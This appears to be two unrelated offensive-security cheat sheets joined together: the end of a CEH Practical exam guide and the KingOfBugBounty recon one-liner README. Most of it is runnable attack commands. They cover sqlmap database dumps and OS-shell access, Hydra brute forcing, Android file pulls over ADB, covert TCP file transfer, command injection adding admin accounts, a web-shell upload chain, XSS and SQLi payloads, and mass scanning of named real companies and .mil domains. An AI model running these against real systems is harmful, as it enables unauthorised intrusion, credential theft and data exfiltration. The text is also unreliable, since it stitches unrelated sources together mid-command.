--cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” --dbs OR sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” --data="id=1&Submit=Submit" --dbs # List Tables, add databse name sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name --tables # List Columns of that table sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name -T target_Table --columns #Dump all values of the table sqlmap -u "http://domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” -D database_name -T target_Table --dump sqlmap -u "http:domain.com/path.aspx?id=1" --cookie=”PHPSESSID=1tmgthfok042dslt7lr7nbv4cb; security=low” --os-shell ``` * Some links [DVWA:Blind SQL with SQLMap](https://medium.com/hacker-toolbelt/dvwa-1-9-viii-blind-sql-injection-with-sqlmap-ee8d59fbdea7), [DVWA - High Level with SQLMap](https://www.youtube.com/watch?v=IR1JsaSQLMc&ab_channel=Archidote) </details> <details> <summary>Password Cracking</summary> > Hydra : FTP, SSH, Telnet ```console # SSH hydra -l username -P passlist.txt 192.168.0.100 ssh # FTP hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100 # If the service isn't running on the default port, use -s hydra -L userlist.txt -P passlist.txt ftp://192.168.0.100 -s 221 # TELNET hydra -l admin -P passlist.txt -o test.txt 192.168.0.7 telnet # Login form sudo hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^:Invalid Password!" ``` </details> # Cryptography <details> <summary>Cipering / Encrypting/ Hashes </summary> #### Hash > Find/Decrypt Hash Online with [Hashes.com](https://hashes.com/en/decrypt/hash) ```shell # In Kali $hash-identifier #Decrypt Hashes hashcat '5f4dcc3b5aa765d61d8327deb882cf99' /usr/share/wordlists/rockyou.txt ``` > Calculate Hash of text/File by [HashCalc](https://www.slavasoft.com/download.htm) in Windows🪟 <img src="https://www.slavasoft.com/images/screenshots/hashcalc.png" /> > [MD5Calculator](https://www.bullzip.com/download/md5/md5calc(1.0.0.0).zip) in Windows🪟 <img src="https://www.bullzip.com/products/md5/dialog.png" /> ### CryptoForge > Encrypt data with Password and only be decoded with cryptoforge by giving password <img src="Cryptoforge.jpg" /> ### BCTextEncoder: Text Encode/Decode <img src="https://www.jetico.com/file-downloads/web_help/bctextencoder/img/textEncode.png" /> ### VeraCrypt: Disk Encrypt/Decrypt > [Step-By-Step-Tutotrial](https://www.veracrypt.fr/en/Beginner%27s%20Tutorial.html) ### CrypTool : Encode/Decode Text (File Extension is .hex) * File → New → Enter Text → Encrypt/Decrypt → Symmetric (Modern) → RC2 → KEY 05 → Encrypt * File → Open → Encrypt/Decrypt → Symmetric (Modern) → RC2 → KEY 05 → Decrypt <img src="Crytool.jpg" /> </details> # Android Hacking <details> <summary>ADB</summary> > [Live Demo of ADB](https://www.youtube.com/watch?v=Hvreb4hjsig) ```shell apt-get update sudo apt-get install adb -y adb devices -l # Connection Establish Steps adb connect 192.168.0.4:5555 adb devices -l adb shell # Download a File from Android using ADB tool adb pull /sdcard/log.txt C:\Users\admin\Desktop\log.txt adb pull sdcard/log.txt /home/mmurphy/Desktop # =================================================================================================== # Same thing can be done via PhoneSploit tool git clone https://github.com/aerosol-can/PhoneSploit cd PhoneSploit pip3 install colorama OR python3 -m pip install colorama python3 phonesploit.py # Type 3 and Press Enter to Connect a new Phone OR Enter IP of Android Device # Type 4, to Access Shell on phone pwd ls cd sdcard ls cd Download #Download File using PhoneSploit 9. Pull Folders from Phone to PC Enter the Full Path of file to Download sdcard/Download/secret.txt ``` </details> # Covert TCP <details> <summary>Covert</summary> > Covert_tcp [source code](covert_tcp.c) > Live Demo [Covert TCP Live Demo-Youtube](https://www.youtube.com/watch?v=bDcz4qIpiQ4) ```shell # Compile the Code cc -o covert_tcp covert_tcp.c # Reciever Machine(192.168.29.53) sudo ./covert_tcp -dest 192.168.29.53 -source 192.168.29.123 -source_port 9999 -dest_port 8888 -server -file recieve.txt # Sender Machine(192.168.29.123) # Create A Message file that need to be transferred Eg:secret.txt sudo ./covert_tcp -dest 192.168.29.53 -source 192.168.29.123 -source_port 8888 -dest_port 9999 -file secret.txt ``` > [Wireshark Capture](Covert_TCP-Capture.pcapng) Hello This 123 - <img src="covertCapture.jpg" /> </details> <details> <summary>Misc</summary> ```shell # If Python version returned above is 3.X # On Windows, try "python -m http.server" or "py -3 -m http.server" python3 -m http.server # If Python version returned above is 2.X python -m SimpleHTTPServer ``` > $python -m SimpleHTTPServer 9000 > $python3 -m http.server 9000 > nslookup www.domain.com [FTP Server](https://archive.org/download/file-zilla-server-0-9-5/FileZilla_Server_0_9_5.exe) [YOUTUBE](https://www.youtube.com/watch?v=_4a4qSaIIrw) > Command Injection ( IP| net user Test_user /Add ) (| net user) (| net localgroup Administrators Test_user /Add) File Upload Vul:: file.php File.php.jpg Add GIF98 and upload and rename .php.jgp Chain attack to execute, go in Command SHell and |copy c:\wamp64\www\DVWA\hackable\uploads\filename.php.jpg c:\wamp64\www\DVWA\hackable\uploads\shell.php > Insert Username Password in Website: [blah;insert into login values ('john','pass123'); --] </details> ## CEH Practical Exam Questions: https://cutt.ly/ceh-practical-git-udy Contact Me📨 for In-person Training/Queries: [email protected]
<h1 align="center"> 👑 What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. 👑 ## Stats King ![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula) [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) <div> <a href="https://www.linkedin.com/in/atjunior/"><img src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"></img></a> <a href="https://www.youtube.com/c/OFJAAAH"><img src="https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white"></a> </div> ## BugBuntu Download - [BugBuntu](https://sourceforge.net/projects/bugbuntu/) - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) ## Special thanks - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) - [@wellpunk](https://twitter.com/wellpunk) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Amass](https://github.com/OWASP/Amass) - [Anew](https://github.com/tomnomnom/anew) - [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - [Axiom](https://github.com/pry0cc/axiom) - [Bhedak](https://github.com/R0X4R/bhedak) - [CF-check](https://github.com/dwisiswant0/cf-check) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Cariddi](https://github.com/edoardottt/cariddi) - [Dalfox](https://github.com/hahwul/dalfox) - [DNSgen](https://github.com/ProjectAnte/dnsgen) - [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Fuff](https://github.com/ffuf/ffuf) - [Gargs](https://github.com/brentp/gargs) - [Gau](https://github.com/lc/gau) - [Gf](https://github.com/tomnomnom/gf) - [Github-Search](https://github.com/gwen001/github-search) - [Gospider](https://github.com/jaeles-project/gospider) - [Gowitness](https://github.com/sensepost/gowitness) - [Hakrawler](https://github.com/hakluke/hakrawler) - [HakrevDNS](https://github.com/hakluke/hakrevdns) - [Haktldextract](https://github.com/hakluke/haktldextract) - [Haklistgen](https://github.com/hakluke/haklistgen) - [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Jsubfinder](https://github.com/hiddengearz/jsubfinder) - [Kxss](https://github.com/Emoe/kxss) - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [Metabigor](https://github.com/j3ssie/metabigor) - [MassDNS](https://github.com/blechschmidt/massdns) - [Naabu](https://github.com/projectdiscovery/naabu) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Rush](https://github.com/shenwei356/rush) - [SecretFinder](https://github.com/m4ll0k/SecretFinder) - [Shodan](https://help.shodan.io/command-line-interface/0-installation) - [ShuffleDNS](https://github.com/projectdiscovery/shuffledns) - [SQLMap](https://github.com/sqlmapproject/sqlmap) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [SubJS](https://github.com/lc/subjs) - [Unew](https://github.com/dwisiswant0/unew) - [WaybackURLs](https://github.com/tomnomnom/waybackurls) - [Wingman](https://xsswingman.com/#faq) - [Notify](https://github.com/projectdiscovery/notify) - [Goop](https://github.com/deletescape/goop) - [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - [GetJS](https://github.com/003random/getJS) - [X8](https://github.com/Sh1Yo/x8) - [Unfurl](https://github.com/tomnomnom/unfurl) - [XSStrike](https://github.com/s0md3v/XSStrike) - [Page-fetch](https://github.com/detectify/page-fetch) ### BBRF SCOPE DoD ```bash bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' ``` ### Bhedak - [Explained command](https://bit.ly/3oNisxi) ```bash cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}" ``` ### .bashrc shortcut OFJAAAH ```bash reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ``` ### Oneliner Haklistgen - @hakluke ```bash subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt; ``` ### Running JavaScript on each page send to proxy. - [Explained command](https://bit.ly/3daIyFw) ```bash cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080 ``` ### Running cariddi to Crawler - [Explained command](https://bit.ly/3hQPF8w) ```bash echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/3nnEhCj) ```bash xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' ``` ### Dalfox scan to bugbounty targets. - [Explained command](https://bit.ly/324Sr1x) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ ``` ### Using x8 to Hidden parameters discovery - [Explaining command](https://bit.ly/3w48wl8) ```bash assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' ``` ### Extract .js Subdomains - [Explaining command](https://bit.ly/339CN5p) ```bash echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 ``` ### goop to search .git files. - [Explaining command](https://bit.ly/3d0VcY5) ```bash xargs -a xss -P10 -I@ sh -c 'goop @' ``` ### Using chaos list to enumerate endpoint ```bash curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' ``` ### Using Wingman to search XSS reflect / DOM XSS - [Explaining command](https://bit.ly/3m5ft1g) ```bash xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify' ``` ### Search ASN to metabigor and resolvers domain - [Explaining command](https://bit.ly/3bvghsY) ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command](https://bit.ly/3eoUhSb) ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command](https://bit.ly/3kZydis) ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command](https://bit.ly/2NvXRyv) ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command](https://bit.ly/3aaEDHL) ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command](https://bit.ly/3aMXQOF) ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command](https://bit.ly/3aKSSCb) ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command](https://bit.ly/2MKkOxm) ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command](https://bit.ly/2NIavul) ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command](https://bit.ly/3c2t6eG) ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command](https://bit.ly/362LyQF) ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command](https://bit.ly/3sD0pLv) ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command](https://bit.ly/3nWHM22) ```bash chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 ``` ### Download all domains to bounty chaos - [Explaining command](https://bit.ly/38wPQ4o) ```bash curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command](https://bit.ly/3shFFJ5) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command](https://bit.ly/2L3YVsc) ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command](https://bit.ly/354lYuf) ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search](https://github.com/gwen001/github-search) Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command](https://bit.ly/3jslKle) Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command](https://bit.ly/3hL263x) echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command](https://bit.ly/2YXiK8N) To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command](https://bit.ly/2Go3Ba4) ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command](https://bit.ly/357b1IY) ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command](https://bit.ly/2R2gNn5) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command](https://bit.ly/2ZeAhcF) ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command](https://bit.ly/3jXbTnU) ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command](https://bit.ly/3hfNV5k) ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` 